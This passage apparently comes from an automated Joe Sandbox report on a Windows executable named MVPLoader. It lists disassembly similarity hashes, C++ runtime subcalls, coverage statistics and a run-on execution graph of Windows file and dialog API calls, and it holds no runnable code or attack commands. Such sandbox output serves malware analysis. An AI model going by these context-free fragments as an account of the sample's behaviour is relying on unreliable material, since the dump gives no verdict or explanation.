                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: Monitor$FromInfoWindow
                                                  • String ID: (
                                                  • API String ID: 332468611-3887548279
                                                  • Opcode ID: 616828ad9e418b93184a309d342e0fb10020226910494d00d4f3ef12efbfb7c9
                                                  • Instruction ID: 291b63e90fdfbaffe25aa144fd0b49c3917e2f939c5861e3d64419fec84ec05d
                                                  • Opcode Fuzzy Hash: 616828ad9e418b93184a309d342e0fb10020226910494d00d4f3ef12efbfb7c9
                                                  • Instruction Fuzzy Hash: BC014F76929745C6EB50EB25E45456AB3B0FB98B44F405235DA8D06315EF3CF1948B20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: Xlength_error@std@@
                                                  • String ID: unknown exception$vector too long
                                                  • API String ID: 1004598685-3115895111
                                                  • Opcode ID: 85c11fd70c1cfe7c8022a1eb601ba302103dd22deb01f3cbf73171b61f87a42d
                                                  • Instruction ID: 9f5e5add0ce3784241d1aa15afd389185c7e9d31417716c6faaef368e4089b81
                                                  • Opcode Fuzzy Hash: 85c11fd70c1cfe7c8022a1eb601ba302103dd22deb01f3cbf73171b61f87a42d
                                                  • Instruction Fuzzy Hash: 95C01299B0690AD0ED08BF08D9A0964A322AF40784BE08872C40C0233AEF6DF486C320
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00007FF7605B36B0: ?width@ios_base@std@@QEBA_JXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B36F3
                                                    • Part of subcall function 00007FF7605B36B0: ?width@ios_base@std@@QEBA_JXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3708
                                                    • Part of subcall function 00007FF7605B36B0: ?width@ios_base@std@@QEBA_JXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B371D
                                                    • Part of subcall function 00007FF7605B36B0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B373D
                                                    • Part of subcall function 00007FF7605B36B0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B375C
                                                    • Part of subcall function 00007FF7605B36B0: ?tie@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_ostream@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3770
                                                    • Part of subcall function 00007FF7605B36B0: ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3783
                                                    • Part of subcall function 00007FF7605B36B0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3793
                                                    • Part of subcall function 00007FF7605B36B0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B38AC
                                                    • Part of subcall function 00007FF7605B36B0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B38B6
                                                    • Part of subcall function 00007FF7605B36B0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B38C7
                                                    • Part of subcall function 00007FF7605B36B0: ?flags@ios_base@std@@QEBAHXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B37BA
                                                    • Part of subcall function 00007FF7605B36B0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B37DA
                                                    • Part of subcall function 00007FF7605B36B0: ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B37ED
                                                    • Part of subcall function 00007FF7605B36B0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B37F9
                                                    • Part of subcall function 00007FF7605B36B0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3816
                                                    • Part of subcall function 00007FF7605B36B0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3825
                                                    • Part of subcall function 00007FF7605B36B0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B384A
                                                    • Part of subcall function 00007FF7605B36B0: ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B385D
                                                    • Part of subcall function 00007FF7605B36B0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3869
                                                    • Part of subcall function 00007FF7605B36B0: ?width@ios_base@std@@QEAA_J_J@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3896
                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7605BD036
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: U?$char_traits@$D@std@@@std@@$D@std@@@2@$?rdbuf@?$basic_ios@V?$basic_streambuf@$?width@ios_base@std@@$?fill@?$basic_ios@?good@ios_base@std@@?sputc@?$basic_streambuf@V01@$??6?$basic_ostream@?flags@ios_base@std@@?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?tie@?$basic_ios@Osfx@?$basic_ostream@V01@@V12@V?$basic_ostream@
                                                  • String ID: Custom types require codec extensions.$Unhandled custom type in StandardCodecSerializer::WriteValue.
                                                  • API String ID: 2005165258-885065478
                                                  • Opcode ID: 624cc1e57f1fc9a241573b9ad8c26ce922f488f05843d064771418d5beb92cce
                                                  • Instruction ID: df5a2e819810b4992499ef9113803fbae1bec567ca72bbef5d2c54c3262574fd
                                                  • Opcode Fuzzy Hash: 624cc1e57f1fc9a241573b9ad8c26ce922f488f05843d064771418d5beb92cce
                                                  • Instruction Fuzzy Hash: 58D06C68E69A02E1EA04FF19E8B18B9A721AF45780BD05432C80E16367EF7CB448C370
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:9.7%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:2.6%
                                                  Total number of Nodes:1483
                                                  Total number of Limit Nodes:28
23470->23343 23474 28b332 23622 28ab2e SHGetMalloc 23474->23622 23475 28b3e1 23475->23433 23481 28b3f7 UnmapViewOfFile CloseHandle 23475->23481 23476 28bdf5 98 API calls 23479 28b4f3 23476->23479 23478 28b33e 23623 27ecad 80 API calls ___scrt_get_show_window_mode 23478->23623 23556 28d0f5 23479->23556 23481->23433 23484 28b355 MapViewOfFile 23484->23487 23485->23475 23488 28b3cd Sleep 23485->23488 23486 28bdf5 98 API calls 23491 28b519 23486->23491 23487->23459 23488->23475 23488->23485 23489 28b542 23624 2712c8 GetDlgItem EnableWindow 23489->23624 23491->23489 23492 28bdf5 98 API calls 23491->23492 23492->23489 23494 271314 23493->23494 23495 27136d 23493->23495 23497 27137a 23494->23497 23629 27da98 62 API calls 2 library calls 23494->23629 23630 27da71 GetWindowLongW SetWindowLongW 23495->23630 23497->23334 23497->23335 23497->23336 23499 271336 23499->23497 23500 271349 GetDlgItem 23499->23500 23500->23497 23501 271359 23500->23501 23501->23497 23502 27135f SetWindowTextW 23501->23502 23502->23497 23505 27a059 23503->23505 23504 27a0ea 23506 27a207 9 API calls 23504->23506 23508 27a113 23504->23508 23505->23504 23505->23508 23631 27a207 23505->23631 23506->23508 23508->23400 23508->23401 23509->23410 23511 279728 23510->23511 23512 279792 CreateFileW 23511->23512 23513 279786 23511->23513 23512->23513 23514 2797e4 23513->23514 23515 27b66c 2 API calls 23513->23515 23514->23458 23516 2797cb 23515->23516 23516->23514 23517 2797cf CreateFileW 23516->23517 23517->23514 23519 279688 23518->23519 23520 279677 23518->23520 23519->23421 23520->23519 23521 279683 23520->23521 23522 27968a 23520->23522 23652 279817 23521->23652 23657 2796d0 23522->23657 23525->23438 23526->23448 23672 27ddff 23527->23672 23530 2712e6 GetDlgItem ShowWindow 23530->23464 23532 28bdff __EH_prolog 23531->23532 23533 28b4e5 23532->23533 23534 28aa36 ExpandEnvironmentStringsW 23532->23534 23533->23476 23542 28be36 _wcsrchr 23534->23542 23536 28aa36 ExpandEnvironmentStringsW 23536->23542 23537 
28c11d SetWindowTextW 23537->23542 23540 2935de 22 API calls 23540->23542 23542->23533 23542->23536 23542->23537 23542->23540 23543 28bf0b SetFileAttributesW 23542->23543 23548 28c2e7 GetDlgItem SetWindowTextW SendMessageW 23542->23548 23551 28c327 SendMessageW 23542->23551 23695 2817ac CompareStringW 23542->23695 23696 289da4 GetCurrentDirectoryW 23542->23696 23698 27a52a 7 API calls 23542->23698 23699 27a4b3 FindClose 23542->23699 23700 28ab9a 76 API calls new 23542->23700 23544 28bfc5 GetFileAttributesW 23543->23544 23555 28bf25 ___scrt_get_show_window_mode 23543->23555 23544->23542 23547 28bfd7 DeleteFileW 23544->23547 23547->23542 23549 28bfe8 23547->23549 23548->23542 23550 27400a _swprintf 51 API calls 23549->23550 23552 28c008 GetFileAttributesW 23550->23552 23551->23542 23552->23549 23553 28c01d MoveFileW 23552->23553 23553->23542 23554 28c035 MoveFileExW 23553->23554 23554->23542 23555->23542 23555->23544 23697 27b4f7 52 API calls 2 library calls 23555->23697 23557 28d0ff __EH_prolog 23556->23557 23701 27fead 23557->23701 23559 28d130 23705 275c59 23559->23705 23561 28d14e 23709 277c68 23561->23709 23565 28d1a1 23726 277cfb 23565->23726 23567 28b504 23567->23486 23569 28cd38 23568->23569 24189 289d1a 23569->24189 23572 28cd45 GetWindow 23573 28cd65 23572->23573 23574 28b5d1 23572->23574 23573->23574 23575 28cd72 GetClassNameW 23573->23575 23577 28cdfa GetWindow 23573->23577 23578 28cd96 GetWindowLongW 23573->23578 23574->23344 23574->23345 24194 2817ac CompareStringW 23575->24194 23577->23573 23577->23574 23578->23577 23579 28cda6 SendMessageW 23578->23579 23579->23577 23580 28cdbc GetObjectW 23579->23580 24195 289d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23580->24195 23582 28cdd3 24196 289d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23582->24196 24197 289f5d 8 API calls ___scrt_get_show_window_mode 23582->24197 23585 28cde4 SendMessageW DeleteObject 23585->23577 23586->23355 23588 28a2e8 23587->23588 23593 28a30d 23587->23593 24200 2817ac 
CompareStringW 23588->24200 23590 28a31b 23595 28a7c3 23590->23595 23591 28a312 SHAutoComplete 23591->23590 23592 28a2fb 23592->23593 23594 28a2ff FindWindowExW 23592->23594 23593->23590 23593->23591 23594->23593 23596 28a7cd __EH_prolog 23595->23596 23597 271380 82 API calls 23596->23597 23598 28a7ef 23597->23598 24201 271f4f 23598->24201 23601 28a818 23604 271951 121 API calls 23601->23604 23602 28a809 23603 271631 84 API calls 23602->23603 23605 28a814 23603->23605 23606 28a83a __vsnwprintf_l new 23604->23606 23605->23385 23605->23390 23606->23605 23607 271631 84 API calls 23606->23607 23607->23605 23608->23368 24209 28ac74 PeekMessageW 23609->24209 23612 28cb88 23616 28cb93 ShowWindow SendMessageW SendMessageW 23612->23616 23613 28cbbc SendMessageW SendMessageW 23614 28cbf8 23613->23614 23615 28cc17 SendMessageW SendMessageW SendMessageW 23613->23615 23614->23615 23617 28cc4a SendMessageW 23615->23617 23618 28cc6d SendMessageW 23615->23618 23616->23613 23617->23618 23618->23388 23619->23445 23620->23469 23621->23474 23622->23478 23623->23484 23624->23364 23625->23423 23626->23441 23627->23419 23628->23409 23629->23499 23630->23497 23632 27a214 23631->23632 23633 27a238 23632->23633 23634 27a22b CreateDirectoryW 23632->23634 23635 27a180 4 API calls 23633->23635 23634->23633 23636 27a26b 23634->23636 23637 27a23e 23635->23637 23639 27a27a 23636->23639 23644 27a444 23636->23644 23638 27a27e GetLastError 23637->23638 23640 27b66c 2 API calls 23637->23640 23638->23639 23639->23505 23642 27a254 23640->23642 23642->23638 23643 27a258 CreateDirectoryW 23642->23643 23643->23636 23643->23638 23645 28e360 23644->23645 23646 27a451 SetFileAttributesW 23645->23646 23647 27a467 23646->23647 23648 27a494 23646->23648 23649 27b66c 2 API calls 23647->23649 23648->23639 23650 27a47b 23649->23650 23650->23648 23651 27a47f SetFileAttributesW 23650->23651 23651->23648 23653 279820 23652->23653 23656 279824 23652->23656 23653->23519 23656->23653 23663 27a12d 23656->23663 23658 
2796dc 23657->23658 23661 2796fa 23657->23661 23660 2796e8 FindCloseChangeNotification 23658->23660 23658->23661 23659 279719 23659->23519 23660->23661 23661->23659 23671 276e3e 74 API calls 23661->23671 23664 28e360 23663->23664 23665 27a13a DeleteFileW 23664->23665 23666 27984c 23665->23666 23667 27a14d 23665->23667 23666->23519 23668 27b66c 2 API calls 23667->23668 23669 27a161 23668->23669 23669->23666 23670 27a165 DeleteFileW 23669->23670 23670->23666 23671->23659 23678 27d28a 23672->23678 23675 27de22 LoadStringW 23676 27ddfc SetDlgItemTextW 23675->23676 23677 27de39 LoadStringW 23675->23677 23676->23530 23677->23676 23683 27d1c3 23678->23683 23680 27d2a7 23681 27d2bc 23680->23681 23691 27d2c8 26 API calls 23680->23691 23681->23675 23681->23676 23684 27d1d7 _strncpy 23683->23684 23685 27d1de 23683->23685 23684->23680 23687 27d202 23685->23687 23692 281596 WideCharToMultiByte 23685->23692 23690 27d233 23687->23690 23693 27dd6b 50 API calls __vsnprintf 23687->23693 23694 2958d9 26 API calls 3 library calls 23690->23694 23691->23681 23692->23687 23693->23690 23694->23684 23695->23542 23696->23542 23697->23555 23698->23542 23699->23542 23700->23542 23702 27feba 23701->23702 23730 271789 23702->23730 23704 27fed2 23704->23559 23706 27fead 23705->23706 23707 271789 76 API calls 23706->23707 23708 27fed2 23707->23708 23708->23561 23710 277c72 __EH_prolog 23709->23710 23747 27c827 23710->23747 23712 277c8d 23753 28e24a 23712->23753 23714 277cb7 23759 28440b 23714->23759 23717 277ddf 23718 277de9 23717->23718 23723 277e53 23718->23723 23791 27a4c6 23718->23791 23720 277f06 23720->23565 23721 277ec4 23721->23720 23797 276dc1 74 API calls 23721->23797 23723->23721 23725 27a4c6 8 API calls 23723->23725 23769 27837f 23723->23769 23725->23723 23727 277d09 23726->23727 23729 277d10 23726->23729 23728 281acf 84 API calls 23727->23728 23728->23729 23731 27179f 23730->23731 23742 2717fa __vsnwprintf_l 23730->23742 23732 2717c8 23731->23732 23743 276e91 74 API calls 
__vswprintf_c_l 23731->23743 23733 271827 23732->23733 23739 2717e7 new 23732->23739 23736 2935de 22 API calls 23733->23736 23735 2717be 23744 276efd 75 API calls 23735->23744 23737 27182e 23736->23737 23737->23742 23746 276efd 75 API calls 23737->23746 23739->23742 23745 276efd 75 API calls 23739->23745 23742->23704 23743->23735 23744->23732 23745->23742 23746->23742 23748 27c831 __EH_prolog 23747->23748 23749 28e24a new 8 API calls 23748->23749 23750 27c874 23749->23750 23751 28e24a new 8 API calls 23750->23751 23752 27c898 23751->23752 23752->23712 23756 28e24f new 23753->23756 23754 28e27b 23754->23714 23756->23754 23765 2971ad 7 API calls 2 library calls 23756->23765 23766 28ecce RaiseException FindHandler new 23756->23766 23767 28ecb1 RaiseException Concurrency::cancel_current_task FindHandler 23756->23767 23760 284415 __EH_prolog 23759->23760 23761 28e24a new 8 API calls 23760->23761 23763 284431 23761->23763 23762 277ce6 23762->23717 23763->23762 23768 2806ba 78 API calls 23763->23768 23765->23756 23768->23762 23770 278389 __EH_prolog 23769->23770 23798 271380 23770->23798 23772 2783a4 23806 279ef7 23772->23806 23778 2783d3 23926 271631 23778->23926 23779 27846e 23825 278517 23779->23825 23783 2784ce 23829 271f00 23783->23829 23786 2783cf 23786->23778 23786->23779 23789 27a4c6 8 API calls 23786->23789 23930 27bac4 CompareStringW 23786->23930 23787 2784d9 23787->23778 23833 273aac 23787->23833 23843 27857b 23787->23843 23789->23786 23792 27a4db 23791->23792 23793 27a4df 23792->23793 24177 27a5f4 23792->24177 23793->23718 23795 27a4ef 23795->23793 23796 27a4f4 FindClose 23795->23796 23796->23793 23797->23720 23799 271385 __EH_prolog 23798->23799 23800 27c827 8 API calls 23799->23800 23801 2713bd 23800->23801 23802 28e24a new 8 API calls 23801->23802 23805 271416 ___scrt_get_show_window_mode 23801->23805 23803 271403 23802->23803 23803->23805 23932 27b07d 23803->23932 23805->23772 23807 279f0e 23806->23807 23808 2783ba 23807->23808 23948 276f5d 76 API calls 
23807->23948 23808->23778 23810 2719a6 23808->23810 23811 2719b0 __EH_prolog 23810->23811 23822 271a00 23811->23822 23823 2719e5 23811->23823 23949 27709d 23811->23949 23813 271b50 23952 276dc1 74 API calls 23813->23952 23815 273aac 97 API calls 23819 271bb3 23815->23819 23816 271b60 23816->23815 23816->23823 23817 271bff 23817->23823 23824 271c32 23817->23824 23953 276dc1 74 API calls 23817->23953 23819->23817 23820 273aac 97 API calls 23819->23820 23820->23819 23821 273aac 97 API calls 23821->23824 23822->23813 23822->23816 23822->23823 23823->23786 23824->23821 23824->23823 23826 278524 23825->23826 23971 280c26 GetSystemTime SystemTimeToFileTime 23826->23971 23828 278488 23828->23783 23931 281359 72 API calls 23828->23931 23831 271f05 __EH_prolog 23829->23831 23830 271f39 23830->23787 23831->23830 23973 271951 23831->23973 23834 273abc 23833->23834 23835 273ab8 23833->23835 23836 273af7 23834->23836 23837 273ae9 23834->23837 23835->23787 24108 2727e8 97 API calls 3 library calls 23836->24108 23839 273b29 23837->23839 24107 273281 85 API calls 3 library calls 23837->24107 23839->23787 23841 273af5 23841->23839 24109 27204e 74 API calls 23841->24109 23844 278585 __EH_prolog 23843->23844 23845 2785be 23844->23845 23858 2785c2 23844->23858 24132 2884bd 99 API calls 23844->24132 23846 2785e7 23845->23846 23852 27867a 23845->23852 23845->23858 23847 278609 23846->23847 23846->23858 24133 277b66 146 API calls 23846->24133 23847->23858 24134 2884bd 99 API calls 23847->24134 23852->23858 24110 275e3a 23852->24110 23853 278705 23853->23858 24116 27826a 23853->24116 23856 278875 23857 27a4c6 8 API calls 23856->23857 23859 2788e0 23856->23859 23857->23859 23858->23787 24120 277d6c 23859->24120 23861 27c991 80 API calls 23864 27893b _memcmp 23861->23864 23862 278a70 23863 278b43 23862->23863 23870 278abf 23862->23870 23868 278b9e 23863->23868 23879 278b4e 23863->23879 23864->23858 23864->23861 23864->23862 23865 278a69 23864->23865 24135 278236 82 API calls 23864->24135 
24136 271f94 74 API calls 23864->24136 24137 271f94 74 API calls 23865->24137 23877 278b30 23868->23877 24140 2780ea 96 API calls 23868->24140 23869 278b9c 23871 279653 79 API calls 23869->23871 23872 27a180 4 API calls 23870->23872 23870->23877 23871->23858 23875 278af7 23872->23875 23874 279653 79 API calls 23874->23858 23875->23877 24138 279377 96 API calls 23875->24138 23876 278c09 23889 278c74 23876->23889 23925 2791c1 __except_handler4 23876->23925 24141 279989 23876->24141 23877->23869 23877->23876 23879->23869 24139 277f26 100 API calls __except_handler4 23879->24139 23880 27aa88 8 API calls 23883 278cc3 23880->23883 23881 278c4c 23881->23889 24145 271f94 74 API calls 23881->24145 23885 27aa88 8 API calls 23883->23885 23904 278cd9 23885->23904 23887 278c62 24146 277061 75 API calls 23887->24146 23889->23880 23890 278d9c 23891 278df7 23890->23891 23892 278efd 23890->23892 23893 278e69 23891->23893 23896 278e07 23891->23896 23894 278f23 23892->23894 23895 278f0f 23892->23895 23914 278e27 23892->23914 23897 27826a CharUpperW 23893->23897 23899 282c42 75 API calls 23894->23899 23898 2792e6 116 API calls 23895->23898 23900 278e4d 23896->23900 23905 278e15 23896->23905 23901 278e84 23897->23901 23898->23914 23903 278f3c 23899->23903 23900->23914 24149 277907 108 API calls 23900->24149 23909 278eb4 23901->23909 23910 278ead 23901->23910 23901->23914 24152 2828f1 116 API calls 23903->24152 23904->23890 24147 279b21 SetFilePointer GetLastError SetEndOfFile 23904->24147 24148 271f94 74 API calls 23905->24148 24151 279224 94 API calls __EH_prolog 23909->24151 24150 277698 84 API calls __except_handler4 23910->24150 23916 27904b 23914->23916 24153 271f94 74 API calls 23914->24153 23915 279156 23918 27a444 4 API calls 23915->23918 23915->23925 23916->23915 23917 279104 23916->23917 23916->23925 24126 279ebf SetEndOfFile 23916->24126 24127 279d62 23917->24127 23919 2791b1 23918->23919 23919->23925 24154 271f94 74 API calls 23919->24154 23922 27914b 23924 2796d0 75 API 
calls 23922->23924 23924->23915 23925->23874 23927 271643 23926->23927 24169 27c8ca 23927->24169 23930->23786 23931->23783 23933 27b087 __EH_prolog 23932->23933 23938 27ea80 80 API calls 23933->23938 23935 27b099 23939 27b195 23935->23939 23938->23935 23940 27b1a7 ___scrt_get_show_window_mode 23939->23940 23943 280948 23940->23943 23946 280908 GetCurrentProcess GetProcessAffinityMask 23943->23946 23947 27b10f 23946->23947 23947->23805 23948->23808 23954 2716d2 23949->23954 23951 2770b9 23951->23822 23952->23823 23953->23824 23956 2716e8 23954->23956 23966 271740 __vsnwprintf_l 23954->23966 23955 271711 23958 271767 23955->23958 23963 27172d new 23955->23963 23956->23955 23967 276e91 74 API calls __vswprintf_c_l 23956->23967 23960 2935de 22 API calls 23958->23960 23959 271707 23968 276efd 75 API calls 23959->23968 23962 27176e 23960->23962 23962->23966 23970 276efd 75 API calls 23962->23970 23963->23966 23969 276efd 75 API calls 23963->23969 23966->23951 23967->23959 23968->23955 23969->23966 23970->23966 23972 280c56 __vsnwprintf_l 23971->23972 23972->23828 23974 271961 23973->23974 23975 27195d 23973->23975 23977 271896 23974->23977 23975->23830 23978 2718a8 23977->23978 23979 2718e5 23977->23979 23980 273aac 97 API calls 23978->23980 23985 273f18 23979->23985 23983 2718c8 23980->23983 23983->23975 23988 273f21 23985->23988 23986 273aac 97 API calls 23986->23988 23987 271906 23987->23983 23990 271e00 23987->23990 23988->23986 23988->23987 24002 28067c 23988->24002 23991 271e0a __EH_prolog 23990->23991 24010 273b3d 23991->24010 23993 271e34 23994 2716d2 76 API calls 23993->23994 23995 271ebb 23993->23995 23996 271e4b 23994->23996 23995->23983 24038 271849 76 API calls 23996->24038 23998 271e63 24000 271e6f 23998->24000 24039 28137a MultiByteToWideChar 23998->24039 24040 271849 76 API calls 24000->24040 24003 280683 24002->24003 24006 28069e 24003->24006 24008 276e8c RaiseException FindHandler 24003->24008 24005 2806af SetThreadExecutionState 24005->23988 
24006->24005 24009 276e8c RaiseException FindHandler 24006->24009 24008->24006 24009->24005 24011 273b47 __EH_prolog 24010->24011 24012 273b5d 24011->24012 24013 273b79 24011->24013 24069 276dc1 74 API calls 24012->24069 24015 273dc2 24013->24015 24018 273ba5 24013->24018 24086 276dc1 74 API calls 24015->24086 24017 273b68 24017->23993 24018->24017 24041 282c42 24018->24041 24020 273cb1 24054 27aa88 24020->24054 24022 273bf4 24023 273c12 24022->24023 24024 273c22 24022->24024 24030 273c26 24022->24030 24070 276dc1 74 API calls 24023->24070 24024->24030 24071 272034 76 API calls 24024->24071 24027 273cc4 24031 273d3e 24027->24031 24032 273d48 24027->24032 24030->24020 24037 273c1d 24030->24037 24072 27c991 24030->24072 24058 2792e6 24031->24058 24078 2828f1 116 API calls 24032->24078 24035 273d46 24035->24037 24079 271f94 74 API calls 24035->24079 24080 281acf 24037->24080 24038->23998 24039->24000 24040->23995 24042 282c51 24041->24042 24044 282c5b 24041->24044 24087 276efd 75 API calls 24042->24087 24045 282ca2 new 24044->24045 24048 282c9d Concurrency::cancel_current_task 24044->24048 24053 282cfd ___scrt_get_show_window_mode 24044->24053 24046 282da9 Concurrency::cancel_current_task 24045->24046 24047 282cd9 24045->24047 24045->24053 24090 29157a RaiseException 24046->24090 24088 282b7b 75 API calls 4 library calls 24047->24088 24089 29157a RaiseException 24048->24089 24052 282dc1 24053->24022 24055 27aa95 24054->24055 24057 27aa9f 24054->24057 24056 28e24a new 8 API calls 24055->24056 24056->24057 24057->24027 24059 2792f0 __EH_prolog 24058->24059 24091 277dc6 24059->24091 24062 27709d 76 API calls 24063 279302 24062->24063 24094 27ca6c 24063->24094 24065 27935c 24065->24035 24066 279314 24066->24065 24067 27ca6c 109 API calls 24066->24067 24103 27cc51 92 API calls __vsnwprintf_l 24066->24103 24067->24066 24069->24017 24070->24037 24071->24030 24073 27c9c4 24072->24073 24074 27c9b2 24072->24074 24105 276249 80 API calls 24073->24105 24104 276249 80 API calls 
